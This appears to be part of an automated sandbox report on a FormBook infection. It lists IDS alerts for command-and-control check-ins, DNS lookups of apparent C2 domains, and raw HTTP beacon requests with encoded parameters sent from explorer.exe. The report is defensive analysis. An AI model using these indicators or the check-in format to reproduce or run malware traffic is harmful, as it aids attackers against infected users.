08/03/21-16:17:31.564062 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49760       | 80        | 192.168.2.6    | 23.27.129.115
08/03/21-16:17:37.249469 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49761     | 34.98.99.30    | 192.168.2.6
08/03/21-16:17:42.360260 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49762       | 80        | 192.168.2.6    | 86.105.245.69
08/03/21-16:17:42.360260 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49762       | 80        | 192.168.2.6    | 86.105.245.69
08/03/21-16:17:42.360260 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49762       | 80        | 192.168.2.6    | 86.105.245.69
08/03/21-16:17:47.490042 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49763       | 80        | 192.168.2.6    | 35.186.238.101
08/03/21-16:17:47.490042 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49763       | 80        | 192.168.2.6    | 35.186.238.101
08/03/21-16:17:47.490042 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49763       | 80        | 192.168.2.6    | 35.186.238.101
08/03/21-16:17:47.603698 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49763     | 35.186.238.101 | 192.168.2.6
08/03/21-16:17:57.380607 | ICMP     | 402     | ICMP Destination Unreachable Port Unreachable        |             |           | 192.168.2.6    | 8.8.8.8
08/03/21-16:17:59.170248 | ICMP     | 402     | ICMP Destination Unreachable Port Unreachable        |             |           | 192.168.2.6    | 8.8.8.8
08/03/21-16:18:07.727357 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49765       | 80        | 192.168.2.6    | 64.190.62.111
08/03/21-16:18:07.727357 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49765       | 80        | 192.168.2.6    | 64.190.62.111
08/03/21-16:18:07.727357 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49765       | 80        | 192.168.2.6    | 64.190.62.111
08/03/21-16:18:18.021646 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49766     | 34.102.136.180 | 192.168.2.6
08/03/21-16:18:23.209711 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49767     | 34.102.136.180 | 192.168.2.6
08/03/21-16:18:43.720793 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49770     | 23.227.38.74   | 192.168.2.6
08/03/21-16:18:48.757162 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49771       | 80        | 192.168.2.6    | 34.102.136.180
08/03/21-16:18:48.757162 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49771       | 80        | 192.168.2.6    | 34.102.136.180
08/03/21-16:18:48.757162 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49771       | 80        | 192.168.2.6    | 34.102.136.180
08/03/21-16:18:48.870420 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49771     | 34.102.136.180 | 192.168.2.6
08/03/21-16:18:59.144074 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49772       | 80        | 192.168.2.6    | 23.27.129.115
08/03/21-16:18:59.144074 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49772       | 80        | 192.168.2.6    | 23.27.129.115
08/03/21-16:18:59.144074 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49772       | 80        | 192.168.2.6    | 23.27.129.115
08/03/21-16:19:04.509962 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49773     | 34.98.99.30    | 192.168.2.6
08/03/21-16:19:09.548891 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49774       | 80        | 192.168.2.6    | 86.105.245.69
08/03/21-16:19:09.548891 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49774       | 80        | 192.168.2.6    | 86.105.245.69
08/03/21-16:19:09.548891 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49774       | 80        | 192.168.2.6    | 86.105.245.69
08/03/21-16:19:14.630343 | TCP      | 2031453 | ET TROJAN FormBook CnC Checkin (GET)                 | 49775       | 80        | 192.168.2.6    | 35.186.238.101
08/03/21-16:19:14.630343 | TCP      | 2031449 | ET TROJAN FormBook CnC Checkin (GET)                 | 49775       | 80        | 192.168.2.6    | 35.186.238.101
08/03/21-16:19:14.630343 | TCP      | 2031412 | ET TROJAN FormBook CnC Checkin (GET)                 | 49775       | 80        | 192.168.2.6    | 35.186.238.101
08/03/21-16:19:14.746183 | TCP      | 1201    | ATTACK-RESPONSES 403 Forbidden                       | 80          | 49775     | 35.186.238.101 | 192.168.2.6
08/03/21-16:19:24.145283 | ICMP     | 402     | ICMP Destination Unreachable Port Unreachable        |             |           | 192.168.2.6    | 8.8.8.8
08/03/21-16:19:27.820551 | ICMP     | 402     | ICMP Destination Unreachable Port Unreachable        |             |           | 192.168.2.6    | 8.8.8.8

                                                                                Network Port Distribution

                                                                                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Aug 3, 2021 16:16:14.622528076 CEST5181853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:14.661019087 CEST53518188.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:19.783152103 CEST5662853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:19.808348894 CEST53566288.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:20.702518940 CEST6077853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:20.735666037 CEST53607788.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:21.790317059 CEST5379953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:21.826452017 CEST53537998.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:22.279573917 CEST5468353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:22.304653883 CEST53546838.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:22.764369965 CEST5932953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:22.807867050 CEST53593298.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:23.017640114 CEST6402153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:23.051059961 CEST53640218.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:23.568423033 CEST5612953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:23.595877886 CEST53561298.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:24.237236977 CEST5817753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:24.262470961 CEST53581778.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:25.610075951 CEST5070053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:25.643716097 CEST53507008.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:28.345086098 CEST5406953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:28.379746914 CEST53540698.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:29.807466030 CEST6117853192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:29.843164921 CEST53611788.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:16:45.117161036 CEST5701753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:16:45.151416063 CEST53570178.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:08.017854929 CEST5632753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:08.060178041 CEST53563278.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:10.111151934 CEST5024353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:10.147648096 CEST53502438.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:15.252206087 CEST6205553192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:15.304837942 CEST53620558.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:20.401591063 CEST6124953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:20.452202082 CEST53612498.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:26.282520056 CEST6525253192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:26.333045959 CEST53652528.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:31.339685917 CEST6436753192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:31.387835026 CEST53643678.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:37.077227116 CEST5506653192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:37.115644932 CEST53550668.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:42.288511038 CEST6021153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:42.331386089 CEST53602118.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:47.424863100 CEST5657053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:47.470793962 CEST53565708.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:52.630390882 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:53.588510990 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:54.660033941 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:56.720144033 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:56.725507021 CEST5845453192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:17:57.380450964 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:57.799863100 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:17:59.170057058 CEST53584548.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:01.768387079 CEST5518053192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:01.965739965 CEST53551808.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:07.571434975 CEST5872153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:07.703706026 CEST53587218.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:17.848912001 CEST5769153192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:17.888134956 CEST53576918.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:23.032887936 CEST5294353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:23.075978994 CEST53529438.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:28.297971010 CEST5948953192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:28.356432915 CEST53594898.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:33.457143068 CEST6402253192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:33.597852945 CEST53640228.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:18:53.900857925 CEST6002353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:18:53.953155041 CEST53600238.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:19.783613920 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:20.798435926 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:21.798687935 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:23.830851078 CEST5719353192.168.2.68.8.8.8
                                                                                Aug 3, 2021 16:19:24.063231945 CEST53571938.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:24.145198107 CEST53571938.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:24.337505102 CEST53571938.8.8.8192.168.2.6
                                                                                Aug 3, 2021 16:19:27.819940090 CEST53571938.8.8.8192.168.2.6

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Aug 3, 2021 16:17:57.380606890 CEST | 192.168.2.6 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
Aug 3, 2021 16:17:59.170248032 CEST | 192.168.2.6 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
Aug 3, 2021 16:19:24.145282984 CEST | 192.168.2.6 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
Aug 3, 2021 16:19:27.820550919 CEST | 192.168.2.6 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 3, 2021 16:15:19.278027058 CEST | 192.168.2.6 | 8.8.8.8 | 0x5ff7 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:15:19.823651075 CEST | 192.168.2.6 | 8.8.8.8 | 0xad73 | Standard query (0) | pxqklq.sn.files.1drv.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:15:46.995280981 CEST | 192.168.2.6 | 8.8.8.8 | 0x2076 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:15:47.592468023 CEST | 192.168.2.6 | 8.8.8.8 | 0xf3d3 | Standard query (0) | pxqklq.sn.files.1drv.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:15:55.983047009 CEST | 192.168.2.6 | 8.8.8.8 | 0x3f26 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:15:56.575704098 CEST | 192.168.2.6 | 8.8.8.8 | 0x2b2a | Standard query (0) | pxqklq.sn.files.1drv.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:10.111151934 CEST | 192.168.2.6 | 8.8.8.8 | 0x38fa | Standard query (0) | www.mobiessence.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:15.252206087 CEST | 192.168.2.6 | 8.8.8.8 | 0xcd43 | Standard query (0) | www.trendyheld.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:20.401591063 CEST | 192.168.2.6 | 8.8.8.8 | 0x758f | Standard query (0) | www.beastninjas.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:26.282520056 CEST | 192.168.2.6 | 8.8.8.8 | 0x9fb | Standard query (0) | www.titanusedcarsworth.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:31.339685917 CEST | 192.168.2.6 | 8.8.8.8 | 0x9bc4 | Standard query (0) | www.importexportasia.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:37.077227116 CEST | 192.168.2.6 | 8.8.8.8 | 0x906b | Standard query (0) | www.kilbyrnefarm.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:42.288511038 CEST | 192.168.2.6 | 8.8.8.8 | 0xd9d0 | Standard query (0) | www.dragonshipping.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:47.424863100 CEST | 192.168.2.6 | 8.8.8.8 | 0x4139 | Standard query (0) | www.mylifeinpark.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:52.630390882 CEST | 192.168.2.6 | 8.8.8.8 | 0x2974 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:53.588510990 CEST | 192.168.2.6 | 8.8.8.8 | 0x2974 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:54.660033941 CEST | 192.168.2.6 | 8.8.8.8 | 0x2974 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:56.725507021 CEST | 192.168.2.6 | 8.8.8.8 | 0x2974 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:01.768387079 CEST | 192.168.2.6 | 8.8.8.8 | 0xa3d4 | Standard query (0) | www.delhibudokankarate.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:07.571434975 CEST | 192.168.2.6 | 8.8.8.8 | 0x9f74 | Standard query (0) | www.vavasoo.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:17.848912001 CEST | 192.168.2.6 | 8.8.8.8 | 0x6d96 | Standard query (0) | www.schoolfrontoffice.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:23.032887936 CEST | 192.168.2.6 | 8.8.8.8 | 0xc142 | Standard query (0) | www.mypursuitpodcast.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:28.297971010 CEST | 192.168.2.6 | 8.8.8.8 | 0x5b26 | Standard query (0) | www.besport24.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:33.457143068 CEST | 192.168.2.6 | 8.8.8.8 | 0xee58 | Standard query (0) | www.opticatervisof.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:53.900857925 CEST | 192.168.2.6 | 8.8.8.8 | 0xe37b | Standard query (0) | www.titanusedcarsworth.com | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:19.783613920 CEST | 192.168.2.6 | 8.8.8.8 | 0x8800 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:20.798435926 CEST | 192.168.2.6 | 8.8.8.8 | 0x8800 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:21.798687935 CEST | 192.168.2.6 | 8.8.8.8 | 0x8800 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:23.830851078 CEST | 192.168.2.6 | 8.8.8.8 | 0x8800 | Standard query (0) | www.f9fui8.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 3, 2021 16:15:19.315892935 CEST | 8.8.8.8 | 192.168.2.6 | 0x5ff7 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:19.881380081 CEST | 8.8.8.8 | 192.168.2.6 | 0xad73 | No error (0) | pxqklq.sn.files.1drv.com | sn-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:19.881380081 CEST | 8.8.8.8 | 192.168.2.6 | 0xad73 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:47.027770996 CEST | 8.8.8.8 | 192.168.2.6 | 0x2076 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:47.628174067 CEST | 8.8.8.8 | 192.168.2.6 | 0xf3d3 | No error (0) | pxqklq.sn.files.1drv.com | sn-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:47.628174067 CEST | 8.8.8.8 | 192.168.2.6 | 0xf3d3 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:56.018642902 CEST | 8.8.8.8 | 192.168.2.6 | 0x3f26 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:56.609251022 CEST | 8.8.8.8 | 192.168.2.6 | 0x2b2a | No error (0) | pxqklq.sn.files.1drv.com | sn-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:15:56.609251022 CEST | 8.8.8.8 | 192.168.2.6 | 0x2b2a | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:17:10.147648096 CEST | 8.8.8.8 | 192.168.2.6 | 0x38fa | No error (0) | www.mobiessence.com |  | 52.58.78.16 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:15.304837942 CEST | 8.8.8.8 | 192.168.2.6 | 0xcd43 | No error (0) | www.trendyheld.com | trendy-heroes.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:17:15.304837942 CEST | 8.8.8.8 | 192.168.2.6 | 0xcd43 | No error (0) | trendy-heroes.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:17:15.304837942 CEST | 8.8.8.8 | 192.168.2.6 | 0xcd43 | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:20.452202082 CEST | 8.8.8.8 | 192.168.2.6 | 0x758f | No error (0) | www.beastninjas.com | beastninjas.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:17:20.452202082 CEST | 8.8.8.8 | 192.168.2.6 | 0x758f | No error (0) | beastninjas.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:26.333045959 CEST | 8.8.8.8 | 192.168.2.6 | 0x9fb | Name error (3) | www.titanusedcarsworth.com | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:31.387835026 CEST | 8.8.8.8 | 192.168.2.6 | 0x9bc4 | No error (0) | www.importexportasia.com |  | 23.27.129.115 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:37.115644932 CEST | 8.8.8.8 | 192.168.2.6 | 0x906b | No error (0) | www.kilbyrnefarm.com | kilbyrnefarm.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:17:37.115644932 CEST | 8.8.8.8 | 192.168.2.6 | 0x906b | No error (0) | kilbyrnefarm.com |  | 34.98.99.30 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:42.331386089 CEST | 8.8.8.8 | 192.168.2.6 | 0xd9d0 | No error (0) | www.dragonshipping.com |  | 86.105.245.69 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:47.470793962 CEST | 8.8.8.8 | 192.168.2.6 | 0x4139 | No error (0) | www.mylifeinpark.com |  | 35.186.238.101 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:56.720144033 CEST | 8.8.8.8 | 192.168.2.6 | 0x2974 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:57.380450964 CEST | 8.8.8.8 | 192.168.2.6 | 0x2974 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:57.799863100 CEST | 8.8.8.8 | 192.168.2.6 | 0x2974 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:17:59.170057058 CEST | 8.8.8.8 | 192.168.2.6 | 0x2974 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:01.965739965 CEST | 8.8.8.8 | 192.168.2.6 | 0xa3d4 | No error (0) | www.delhibudokankarate.com |  | 154.215.87.120 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:07.703706026 CEST | 8.8.8.8 | 192.168.2.6 | 0x9f74 | No error (0) | www.vavasoo.com |  | 64.190.62.111 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:17.888134956 CEST | 8.8.8.8 | 192.168.2.6 | 0x6d96 | No error (0) | www.schoolfrontoffice.com | schoolfrontoffice.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:18:17.888134956 CEST | 8.8.8.8 | 192.168.2.6 | 0x6d96 | No error (0) | schoolfrontoffice.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:23.075978994 CEST | 8.8.8.8 | 192.168.2.6 | 0xc142 | No error (0) | www.mypursuitpodcast.com | mypursuitpodcast.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:18:23.075978994 CEST | 8.8.8.8 | 192.168.2.6 | 0xc142 | No error (0) | mypursuitpodcast.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:28.356432915 CEST | 8.8.8.8 | 192.168.2.6 | 0x5b26 | No error (0) | www.besport24.com | besport24.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 3, 2021 16:18:28.356432915 CEST | 8.8.8.8 | 192.168.2.6 | 0x5b26 | No error (0) | besport24.com |  | 51.83.52.226 | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:33.597852945 CEST | 8.8.8.8 | 192.168.2.6 | 0xee58 | Server failure (2) | www.opticatervisof.com | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:18:53.953155041 CEST | 8.8.8.8 | 192.168.2.6 | 0xe37b | Name error (3) | www.titanusedcarsworth.com | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:24.063231945 CEST | 8.8.8.8 | 192.168.2.6 | 0x8800 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:24.145198107 CEST | 8.8.8.8 | 192.168.2.6 | 0x8800 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:24.337505102 CEST | 8.8.8.8 | 192.168.2.6 | 0x8800 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)
Aug 3, 2021 16:19:27.819940090 CEST | 8.8.8.8 | 192.168.2.6 | 0x8800 | Server failure (2) | www.f9fui8.xyz | none | none | A (IP address) | IN (0x0001)

                                                                                HTTP Request Dependency Graph


HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49757 | 52.58.78.16 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Aug 3, 2021 16:17:10.204705954 CEST | 6871 | OUT | GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
Host: www.mobiessence.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 3, 2021 16:17:10.226708889 CEST | 6872 | IN | HTTP/1.1 410 Gone
Server: openresty
Date: Tue, 03 Aug 2021 14:17:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 62 69 65 73 73 65 6e 63 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='5; url=http://www.mobiessence.com/' />a </head>9 <body>3b You are being redirected to http://www.mobiessence.coma </body>8</html>0


                                                                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                                1          | 192.168.2.6 | 49758       | 23.227.38.74   | 80               | C:\Windows\explorer.exe
                                                                                Timestamp                           | kBytes transferred | Direction | Data
                                                                                Aug 3, 2021 16:17:15.323340893 CEST | 6873 | OUT | GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.trendyheld.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:15.387608051 CEST | 6874 | IN | HTTP/1.1 403 Forbidden
                                                                                Date: Tue, 03 Aug 2021 14:17:15 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Sorting-Hat-PodId: -1
                                                                                X-Request-ID: db62f90e-a4d5-4a11-a9b8-e1eaba5a047f
                                                                                X-Download-Options: noopen
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Dc: gcp-europe-west1
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 67902b1edb760629-FRA
                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
